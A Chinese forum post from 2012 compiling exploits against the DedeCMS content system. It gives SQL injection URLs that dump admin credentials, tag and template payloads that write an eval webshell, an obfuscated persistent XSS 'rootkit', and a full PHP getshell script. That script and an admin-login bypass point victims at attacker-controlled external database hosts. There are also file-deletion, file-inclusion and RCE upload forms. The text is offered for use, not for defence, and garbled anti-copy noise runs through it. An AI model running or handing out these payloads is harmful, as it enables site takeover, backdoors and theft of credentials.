dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞
% u" Z+ K, K8 _( O; J/ jhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
! q* G6 M" ~: `+ @. z, x; z$ ?) o5 M7 d; s/ }/ ]9 t
; D8 y4 g( V& c/ O5 B
% C& U: x+ F$ \! q% J  k5 ]/ ^

; W: A* L% M# B- J# M
9 T  L8 x& C/ p8 }8 `# W1 g6 E
6 |5 _; l) B& B
: \- k0 s. a- ^  d# x2 J8 q! _9 D, I9 k9 d; v" {2 V; h
DedeCms v5.6 嵌入恶意代码执行漏洞3 f2 Q- O7 O# w+ h
注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}$ \! ^( t/ m- f/ G
发表后查看或修改即可执行* H6 @5 p: I# Z: P: d, n4 y& d- r
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}$ T* ?) R; S  Q/ t( \
生成x.php 密码xiao，直接生成一句话。' x( x& t, Y8 e6 t6 M
: {8 q' ~1 s! u+ C3 G
% ^! T5 w6 H' @/ X8 B+ y

2 Q5 }. ^! E/ ]; c7 \  ~
0 E2 G8 v, k1 x4 W. B/ W1 I. e) H3 E8 P/ i9 Q8 y0 O% [" j- h

' z8 r, M( N" O6 V& B- a1 b# o+ V: n- r/ L  f/ S5 z. P$ t

9 }% `# ?; I9 P1 i" PDede 5.6 GBK SQL注入漏洞. |( B* E0 o. u& w
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';- O. \& V* w, e; I$ o  m4 J
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
, ?% O1 f: P! r% |3 _http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
, Q6 V- v$ S9 X& w( ^. J  _3 k
1 N$ C8 N$ u: `0 J3 k5 u5 T9 [, t  ]. t

# j: s" c$ H7 k8 A0 C0 G
- U! `1 ^! L+ W& ]
" ^& }5 a, C) d& J3 Q; |2 a/ ?8 K3 V
( n$ }) W9 y9 `% ADEDECMS 全版本 gotopage变量XSS漏洞
1 q2 X# H+ @5 ?+ }" Z% K0 z1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
# X" V0 H, N5 k0 Lhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="" ?$ J: M) Y- }; z, S" L* b
& i* k0 n' o' F2 U
( Q# C- L. H; a  k! u
2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。
  o: |* ?& `% i# [http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell/ }5 F! l" I! p$ I6 U
#!usr/bin/php -w" F# M1 g* _& s$ P; w
<?php, ~3 ~6 E/ J6 c. i  ^7 h/ J! V' h* N
error_reporting(E_ERROR);3 E, W* b8 W2 m- E
set_time_limit(0);! ~; `& K$ E) ?! @% K& Z
print_r('& i6 w- G* y: D
DEDEcms Variable Coverage; u) E; i& ?* d$ a2 ^
Exploit Author: www.heixiaozi.comwww.webvul.com
);
8 h, y, e% E; F3 S' M2 m' fecho "\r\n";! I* T( O4 d" w& _
if($argv[2]==null){; R, `9 F- p3 K/ a/ q. o
print_r('6 ^' M! \, a6 H! S
+---------------------------------------------------------------------------+4 l5 A, U4 U# h6 O+ I  g6 F$ v
Usage: php '.$argv[0].' url aid path
: v" S( j. H! H2 [% Z+ j; Q% caid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/" S( y$ p& ~1 S( E
Example:
& e- ?6 p  j3 F+ L1 q( E0 H/ Dphp '.$argv[0].' www.site.com 1 old9 G4 e6 S, v  ?0 m& J* U
+---------------------------------------------------------------------------+9 o  v: u2 `3 m& {# J
');
: h6 B1 A6 C0 v; B9 d8 Rexit;+ z6 A' V. e5 D# B6 i
}( x/ p0 W0 b: \% `( G
$url=$argv[1];
' u$ R# P: r$ g$aid=$argv[2];- m$ c; }3 L/ g3 U2 I8 L& i
$path=$argv[3];
$ y1 |8 H/ X# i9 a3 U5 \$exp=Getshell($url,$aid,$path);( [! S5 g! ~  d5 k) e
if (strpos($exp,"OK")>12){3 h: w1 j; K' M7 W* i# o
echo "+ P$ \0 C) K0 e! F4 ?& Q
Exploit Success \n";8 }, I5 K* \2 ^  s+ K& G- m  F
if($aid==1)echo "
2 o/ x9 U" G1 J( }Shell:".$url."/$path/data/cache/fuck.php\n" ;: P; }+ |# F1 q, d$ Y
" K4 T& e" k3 ?9 H- |

2 i! M# G. i" B) {* r6 A1 a, ^if($aid==2)echo "% S. Y! }: Z7 U6 D
Shell:".$url."/$path/fuck.php\n" ;
$ G' I% s0 j' b: C( |/ N$ ~! p/ F# s. ]8 Y
! T! I  T* Y& p# I
if($aid==3)echo "1 Q% [" T, f5 v1 j
Shell:".$url."/$path/plus/fuck.php\n";
: K& {- ^/ b3 n# i1 B7 X' L* a1 g+ }  q: m8 B% w/ f# ^' a
& y% z/ O6 H5 V! E, u! b8 s  |9 J
}else{+ F2 ~2 u0 }' a7 R9 V
echo "% R! K8 A  n. d" M
Exploit Failed \n";
1 A. @0 }* A9 Y9 Z! J}
, i% z4 R, E" ^- O6 `function Getshell($url,$aid,$path){
: |- r7 X& |- ~4 r5 b  O2 x$id=$aid;: G8 W( x- J+ t, U
$host=$url;
) u- ?5 F: P5 E$ f, g3 V2 n$port="80";* D  [1 }7 x7 m" m" G  P% }
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";% r5 H: U; b7 M
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
7 J) D/ Z8 f; v$data .= "Host: ".$host."\r\n";
: U  M$ f( i( A7 f6 R$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
( c1 ~. ~5 d$ m5 Y1 [$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";7 G+ G' x/ L& _/ I2 \% D
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
( y; x; B8 K6 {: z+ M1 H//$data .= "Accept-Encoding: gzip,deflate\r\n";
  C) Y% N- k. |  P: U! U1 [3 p9 o$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";" `; x9 s& H* |2 |* U3 f8 n! w' n
$data .= "Connection: keep-alive\r\n";8 i" j1 W) j  V; H& L6 ~
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";6 L1 N3 Q. _5 ~, ~) ?: v* y2 d
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";  i2 J1 O+ C& i3 b
$data .= $content."\r\n";* M6 i% r2 S" C
$ock=fsockopen($host,$port);7 d1 i7 R$ N8 f8 t* o
if (!$ock) {1 h0 G  V& A  Z- y4 L
echo "
9 |! S/ q5 {- R7 D4 }7 l: ?5 hNo response from ".$host."\n";3 @: }5 _; r$ @! C1 g
}3 v9 E1 T9 D* q" i6 _; X
fwrite($ock,$data);0 D" d/ j7 v( k& |- j
while (!feof($ock)) {
5 O5 z  }  `- p& t( \2 c$exp=fgets($ock, 1024);7 y8 @" n4 f% \1 P3 f- ?) a8 m
return $exp;5 o3 Q" b6 H! Y$ H
}+ b1 K+ P7 n" U: X
}
5 G8 {  k4 ~, R$ F$ d% ~6 s1 o8 C/ {% _/ ]( j8 P" U7 ]
* e: s* s$ \* v2 J& A: G1 I
?>: R6 f* S8 E  t( g- N

# A# A, `7 ]* H# F/ s; v
8 L2 ]' R) k( Z; a. k/ M
1 ?# m) I2 ^4 ~! p2 K& M' W& x+ |2 r/ W" Y- [8 o# B5 M) }

& i$ {1 G1 o: Y7 N3 V' M$ ?3 |% i# M7 ?; [9 e: g9 K1 D

1 f. Z# [3 i$ j2 B5 J' j+ s3 `, J( L' h5 |) @

) M! h, B. d0 x, m+ \0 R/ G0 A( v" x4 n# M
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
8 x" B, B1 ?! q+ Phttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
% i  G- W+ u3 d4 G: W$ @0 Q, Y

0 B# C5 Z9 Y( U& o+ q把上面validate=dcug改为当前的验证码，即可直接进入网站后台6 a3 Z1 P& S6 B. {6 T

  n% b8 g1 {6 z" D) i2 K: F! G& O. _0 Z* a/ P  S( U
此漏洞的前提是必须得到后台路径才能实现
( R: \/ G+ I: z  P# B! K4 ?/ F+ b0 P! i! ?* H1 H( r/ G# f6 W( z
" I: v. ]* {' @& I

; I; m$ c+ A! Y5 s: n0 d
$ k/ _) V# H' @) h; v
! \3 i5 V7 y, u
! k9 I2 p) t# S; H4 E8 f& q3 o
) j! s/ B- q+ G8 I3 Q0 P  A. t
3 Z/ e( H7 o; r; l, A) A, W: A- q9 N' l, Q/ x3 W! }

& \1 `% Q& u: X5 s7 s) X! N: [Dedecms织梦标签远程文件写入漏洞
5 A/ S) e3 R6 U2 N4 ]0 f前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
) d1 x  ]) D: ]$ D6 ]' r
# b" k6 ]3 v2 m. X2 R7 U% J- v$ p" Z
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。 ! o; W& e5 a. p. J3 R
<form action="" method="post" name="QuickSearch" id="QuickSearch">2 D3 o, S1 u+ ^! p1 H6 h4 d8 R
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />' J& f4 T: g# a+ Q0 N  H
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
  j1 F- K8 @% F( @0 ]6 X<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br /># i7 ^& V* E$ ]  Y) p
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />2 ~- X  y( @) U' t' V
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />$ y4 X5 m  R$ H* T% o1 t6 _& k7 D
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
: g4 t, _& r8 ?# M( e7 L<input type="text" value="true" name="nocache" style="width:400">  V; `9 Y9 p" Z5 {3 x3 F. N
<input type="submit" value="提交" name="QuickSearchBtn"><br />- X2 `4 y" T2 `1 Y* @, A: Y( |
</form>, {- L2 X9 A0 y) Y
<script>
* F6 A4 O4 `, U3 K' I8 vfunction addaction()7 D- |( p! _+ c# b
{2 e) r% O  E* p/ k3 M
document.QuickSearch.action=document.QuickSearch.doaction.value;
4 n. Y. b6 ?$ h}. `0 ]1 T" Q6 u# P  c
</script>
- U2 L8 L; f  j& x" b% s2 P) M$ h8 x7 j! U: _2 f

6 w6 }3 g6 {9 l7 K5 a7 B- g' _  S) g5 N- H+ \. C
) l$ B) }# q: f$ g6 q, \3 \% o
: `% \% l) l! O3 ~6 R7 q1 Z; [  T+ Y
& j9 [" [2 k! p" `" \; n$ U
! s# h7 u) ?) ^

6 t$ J; W% F6 P; D4 K  \. c6 }+ u. U' E4 m0 m
+ V0 W# Y; k1 w/ c# p; |: G# ]
DedeCms v5.6 嵌入恶意代码执行漏洞" A) \8 Y7 T: j/ a
注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行
  B& e$ S+ O# R" [# |0 ga{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
4 t7 s5 @' y0 r2 f+ F) I9 D生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得. o: ^4 V. e; m' |/ ~/ U# l
Dedecms <= V5.6 Final模板执行漏洞
/ ~1 I" @/ k# h0 J2 G& I! T注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
" p/ P& ]' B3 [/ R. A2 g. D3 D* puploads/userup/2/12OMX04-15A.jpg
& d9 l+ Q* ~& y9 b! n* B2 Q1 T2 u0 J) `( |& B) w" x
6 s1 q* i6 h. }2 F5 N
模板内容是（如果限制图片格式，加gif89a）：6 D) P5 ?  J0 j% Y7 h* D. d
{dede:name runphp='yes'}, c4 q2 a- k; b' V* t
$fp = @fopen("1.php", 'a');) f: F1 X6 J2 Y6 }" M( V: s, t, O: u
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");9 g& ?* A! t$ J' d, p
@fclose($fp);4 _! w$ Z0 \; b, {! U/ y" Y* U
{/dede:name}. T; A- A4 p- O  Z' s
2 修改刚刚发表的文章，查看源文件，构造一个表单：* l/ I& S) N$ V8 S
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
" h5 v4 S& p& ~' d9 Q" Q<input type="hidden" name="dopost" value="save" />
1 N+ o- X  X& G3 ~<input type="hidden" name="aid" value="2" />
7 Y# |+ H2 i9 ^2 l3 _& }  X<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />  W* ^, _) {/ O$ ?* [" a
<input type="hidden" name="channelid" value="1" />' G% B2 u$ U  X
<input type="hidden" name="oldlitpic" value="" /># K# X7 U0 N- V  K/ t
<input type="hidden" name="sortrank" value="1275972263" />- \9 A4 N+ e& n. v) ?

" Z  i! @4 f! T( v+ }- M- _/ j( v8 d* @% i( A
<div id="mainCp">
7 w6 Q. a9 g' Z/ \( W  W<h3 class="meTitle"><strong>修改文章</strong></h3>9 U& m! n" }) x

) I% l9 r9 |; u4 A, X4 X" Y6 q; ^4 y1 _6 o0 `
<div class="postForm">
! Z1 \# f9 J) I/ v: h<label>标题：</label>
1 H' A. Z+ ]8 M<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
6 U' Y* g" v  x7 B
0 b! u3 A7 x, Z2 N9 |% D& j# t+ {* [, f, p/ Y  y
<label>标签TAG：</label>
9 t: v6 T8 ^4 o4 L<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
7 @+ H. V6 j  I, q6 C  f
3 c  k8 P$ J5 O0 [; f$ F: \; {; A9 g3 X! ]2 V3 ~9 d7 C. ?3 g
<label>作者：</label>: f3 T) e4 y4 ^7 z4 P2 k; P1 H
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>. G, c/ i  `0 d+ ?6 M
* ]3 g) e3 M7 w
# M' n, ~5 r, I2 t6 C
<label>隶属栏目：</label>
# @- g( g: e0 D8 L. @( |<select name='typeid' size='1'>4 c' _' u2 F/ u1 R8 c0 L" L
<option value='1' class='option3' selected=''>测试栏目</option>
5 m1 P" h7 ?9 d1 Z$ v</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)& h8 J6 p1 \/ x9 G
/ T' E2 }, L# L" l0 G  P" F

: b* I; j" P' T# G% Q<label>我的分类：</label>
$ v3 F( q3 j! o- G% K6 X<select name='mtypesid' size='1'>
! o8 ?4 G9 T( n<option value='0' selected>请选择分类...</option>  T( C3 q1 i- i6 |0 g5 ^
<option value='1' class='option3' selected>hahahha</option>
1 a8 E9 v9 x4 ]6 a- A7 a</select>
# |. ~* I8 F3 G% D
0 e* M# I) j3 r$ @/ ~: K; e! L1 e+ {+ y$ _/ Z
<label>信息摘要：</label>
. d' W7 o! c8 y9 _2 U<textarea name="description" id="description">1111111</textarea>4 R* S( U/ A  ?& g
(内容的简要说明)
' b/ H( t' y* ]  A7 _/ W
% f1 @* X* C0 o
- ?: L$ `+ ^" N$ m# s) n8 r2 U<label>缩略图：</label>: a4 i( Q" E1 V! n! @. k" \, i/ ]/ X
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/># S9 k! i, ~3 C- W  z6 M

5 R0 h: i$ G+ a( ?
4 [0 C  _: p7 y5 ?1 ~9 Z<input type='text' name='templet'
, F2 l2 N3 o+ D1 k  c* ~value="../ uploads/userup/2/12OMX04-15A.jpg">
( o' W4 `9 [! q' x8 I  o+ W" A<input type='text' name='dede_addonfields'
# n1 e' Q' X' C" n$ ]9 K/ t7 Z" i8 yvalue="templet,htmltext;">（这里构造）
4 g2 ~9 j; g! C* Y! T2 V</div>
- T- j/ f& F- e) g, n7 g5 G# T
  h4 R# Y' W3 J6 l& ~5 A" q$ {5 U- N( V

; l# x0 }% a4 V. _, B7 Q<h3 class="meTitle">详细内容</h3>! V0 C$ X$ ]! L4 q

2 O% x- w0 ~- F7 G9 b" L8 |
5 X1 {8 W4 V0 `$ F, m<div class="contentShow postForm">- @7 D+ _* w4 S2 w3 x* u
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
; T) M) r" N$ _) {+ L1 u* J
  s. a- S4 S" W+ W# C' q
* R+ h; B/ {! @% m- r<label>验证码：</label>* ?8 Y# n5 S, J
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />5 b9 Z2 O# T+ e/ X1 i; T; j" m
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
: d( r; ~% n: q& u- O
, Y: v- j! ]1 C8 v7 w* \3 j  ?; k" ~. o' }' K, S) `! H
<button class="button2" type="submit">提交</button>
3 e! c; X5 b4 I2 p( S<button class="button2 ml10" type="reset">重置</button>
$ H/ w- V3 z" E  `1 J" V, z</div>
6 f% I" C$ y& {. w1 |. u5 s1 J7 X8 v3 t4 }8 ?9 `7 L
6 I0 A9 W$ d9 b8 p. ]% s" u
</div>4 Z6 O; ^5 O: g
7 @3 Q: w5 [. M) a9 A7 R5 d6 F

: [; h+ k- _/ Z</form>3 x( b3 P: a9 G# z2 l; z' z

2 ?0 m9 K+ S! f# R+ z0 O* c# B" K1 }: _
提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：  j$ H' ]0 h* ^3 I, G& D
假设刚刚修改的文章的aid为2，则我们只需要访问：* F  M* ^: P; j* ]
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php
: G1 e. }: E* J* g4 X: c' w6 v$ e% c& O4 d! ]* k* L1 E

" Q. A9 K8 w& D. G
: e! s* t2 {% ]0 C
3 k" A+ h/ ^5 ~4 A% H( x3 h0 y! i0 c# [* }$ K2 Q7 d
+ q0 y8 F5 U; h) C) T3 M

- m" z0 R8 u4 f2 X8 C) ^$ l2 @0 G0 T2 M5 K( n
, Z  G- b" T! `' A" \, e
  [& c+ f# j3 o, f! a2 q9 B& m8 x

1 f) A' W7 p/ K, S) F; f% Z
- n, _, l6 \6 ?7 m; U/ S- j, rDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
6 T7 t: c2 ], e; h* A. O; a" AGif89a{dede:field name='toby57' runphp='yes'}0 K" j! L8 H& q+ @
phpinfo();. D$ V4 u0 W6 s( O& {- \, n
{/dede:field}0 w+ z) ^, _1 A! B! k
保存为1.gif
' v, b# u0 O2 K9 ]/ z7 ]<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 5 L- w; l* [5 n' L
<input type="hidden" name="aid" value="7" />
6 p% a; P6 ~0 H<input type="hidden" name="mediatype" value="1" />
, y. `* G; i5 A<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> # ~' S* L6 X$ `) v7 ~8 b
<input type="hidden" name="dopost" value="save" />
1 u& D, h! G' `/ C3 J<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 0 ~: X$ t+ ]" x; K  h7 ^: r
<input name="addonfile" type="file" id="addonfile"/>
5 r7 n: n; M: F. N7 }7 X1 Q<button class="button2" type="submit" >更改</button>
) C  ?. K, @% V8 U" R& ?" M, Q/ F</form>
- ]: {. k* E: l. ]6 J; K, E3 ?2 }5 u# y, B1 ~! L$ |# O
% q3 J6 _8 G2 E# s
构造如上表单，上传后图片保存为/uploads/userup/3/1.gif6 @' B- c" s, ?- l6 @$ l$ V7 O
发表文章，然后构造修改表单如下：
+ p* a! W+ {7 i9 ^) o, g& B1 h& m) ~; n) u  H1 B
  O$ ~3 V* K' `- E# D! @4 @* y
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 6 T, j: n/ O$ i5 l5 Q7 g
<input type="hidden" name="dopost" value="save" />
8 X( c1 h) v) p# V* ?! I<input type="hidden" name="aid" value="2" /> 5 @$ ]$ S( j( n  L4 u- g3 v. W
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
: E( _, a- z% l8 g0 i) ^<input type="hidden" name="channelid" value="1" /> . Q, L/ Q4 q3 y
<input type="hidden" name="oldlitpic" value="" />
( s# F* M3 \% |) i  A  E* I8 r. d<input type="hidden" name="sortrank" value="1282049150" />
3 i, a/ M8 T  `) O<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> . W/ h9 F  h: D! H
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
* `) z; |# ]9 o2 p<select name='typeid' size='1'>
/ [' x) d& l2 x6 p# u0 r<option value='1' class='option3' selected=''>Test</option>   `) }* o! l2 H7 ?1 E/ u7 s
<select name='mtypesid' size='1'>
  M  _4 h- [4 h* w. O7 e) `<option value='0' selected>请选择分类...</option>
) G3 F# J1 i, z: |/ K/ l) n<option value='1' class='option3' selected>aa</option></select>
. Z$ i% R$ j9 a1 t0 c<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
! R6 v$ X3 f# Q, @0 y<input type='hidden' name='dede_addonfields' value="templet">
& B0 S9 O& x. a& }: L* b<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
9 H* H9 \3 o  m! m, Y<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> # j1 T+ w/ G- _; o
<button class="button2" type="submit">提交</button>
& P7 Z9 p$ a0 @( s& L</form>, c- A! Y0 n* U7 x: _. d" k9 h# Y; a
' s5 g- B/ s0 J
2 N1 n; N: t0 [# Z
# l% e  W* P. g# w! C& y" Y

" [: x$ p2 k+ }
( ^$ E$ g5 ^/ C% W* l5 \
: b: l3 P% `' `  m6 o4 C  f3 M* B# E- a5 s: Z
: g# E, L& }( r, I
& L( i; z* O* ~/ H" G+ `0 K: p

- S& ?: m" |/ o* G% A4 Y: F8 {0 P3 y1 k: `0 J
7 g; m/ Q' [: L' @* a5 c( K6 S" X
织梦(Dedecms)V5.6 远程文件删除漏洞; S4 p& H' F5 P
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞   i9 ]% F6 [. |- [5 X' F
http://www.test.com/plus/carbuya ... urn&code=../../& s5 \$ e# s+ K! Y& z1 d5 ?3 Y

5 ^$ J( T& Z0 u) V
' r8 J: \- l1 Y9 A! j# |' k4 G6 s- P: ?; C7 {' G1 {3 d' M8 D
  P( n0 N0 h. a  b3 N* {

; u$ ~3 C' x, o, p! e, [% e& @1 ^" B* G2 V
9 y; g: @( k: s; \4 a$ U& z5 m- L

- Z1 \5 S  l9 m9 M; d% ^  j4 z3 _( u6 @2 T6 r
7 c3 ~. y, X3 K6 |9 ]
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 3 U& v9 `  ]4 p9 q9 y. q& W
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
' v' |9 }- T( p2 w4 c, j密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5  A  @* Z1 y6 q2 \

' M! `$ d) Q/ e) g
3 A5 y. V* k7 ?$ h  w  q% p' H; s5 {/ w3 c  k3 t" G

2 A8 K1 ]2 t% \# d- I5 \4 s" l0 _6 \$ t; @) H- j! `  Q2 ]5 D

+ Z! |8 h3 r7 v4 r- k4 H$ M
# n6 |. {$ u7 B! M6 O8 e
! a8 z& X! E8 [! B
' q5 O, e0 U1 e/ _7 J" r5 R
& E% Q  ?5 \$ S0 `3 S: s织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
: g' k3 B. r' J6 Hhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='; y3 _5 ?" A2 u

# L3 b& |# J- G7 k! ?
# [1 d- O/ X4 @3 z) o! w% A8 q, a( R7 \- Z
2 m2 I) x2 S! h  A3 N! @6 q9 W5 C

3 O1 A: N% X9 A5 Q$ G0 `$ s4 o; b% J$ {6 _( l- K

  n* w4 u: O! S6 {9 n
, ?5 H2 T% o' P3 R7 U) h+ l0 N- x- l! k" ~. ~; Z! W

+ R8 G( {, d9 ^5 O$ X织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
: C$ i2 N3 t" `2 u) J/ i. B4 C<html>
2 M' ?) q) {+ [<head>
9 z+ o0 n8 w7 f. H$ J/ y" ^  H, z) y<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
' F1 a* A0 e5 W</head>
) X$ Z0 g. q' X+ [6 X<body style="FONT-SIZE: 9pt">
5 l1 h, B; M5 B* e---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />1 B; j  z+ u/ G9 c& T' Y7 p
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
$ c7 \; k) S2 K<input type='hidden' name='activepath' value='/data/cache/' />6 o0 K, [  D- c' C4 f4 H; p  `# x
<input type='hidden' name='cfg_basedir' value='../../' />. a8 [2 t, {- E0 t, m, \+ {
<input type='hidden' name='cfg_imgtype' value='php' />
7 e+ C  q( D/ K$ W& b# E: f<input type='hidden' name='cfg_not_allowall' value='txt' />
: q" {- V  _9 T* t9 Z: V<input type='hidden' name='cfg_softtype' value='php' />
8 k+ W4 q$ v. w<input type='hidden' name='cfg_mediatype' value='php' />
